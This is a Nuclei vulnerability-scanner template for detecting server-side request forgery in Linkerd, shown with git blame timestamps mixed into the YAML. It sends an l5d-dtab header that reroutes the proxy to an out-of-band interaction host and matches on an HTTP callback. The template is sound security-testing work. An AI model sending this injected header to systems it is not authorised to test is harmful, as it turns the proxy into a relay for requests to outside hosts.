nuclei-templates/misconfiguration/linkerd-ssrf-detect.yaml

22 lines
464 B
YAML
Raw Normal View History

id: linkerd-ssrf-detection
2020-06-22 21:25:52 +00:00
info:
name: Linkerd SSRF detection
author: dudez
severity: high
reference:
- https://twitter.com/nirvana_msu/status/1084144955034165248
2021-10-18 20:40:26 +00:00
tags: ssrf,linkerd,oast
2020-06-22 21:25:52 +00:00
requests:
- method: GET
path:
2021-01-13 07:31:46 +00:00
- "{{BaseURL}}"
2020-06-22 21:25:52 +00:00
headers:
l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443
2020-06-22 21:25:52 +00:00
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
2020-06-22 21:25:52 +00:00
words:
- "http"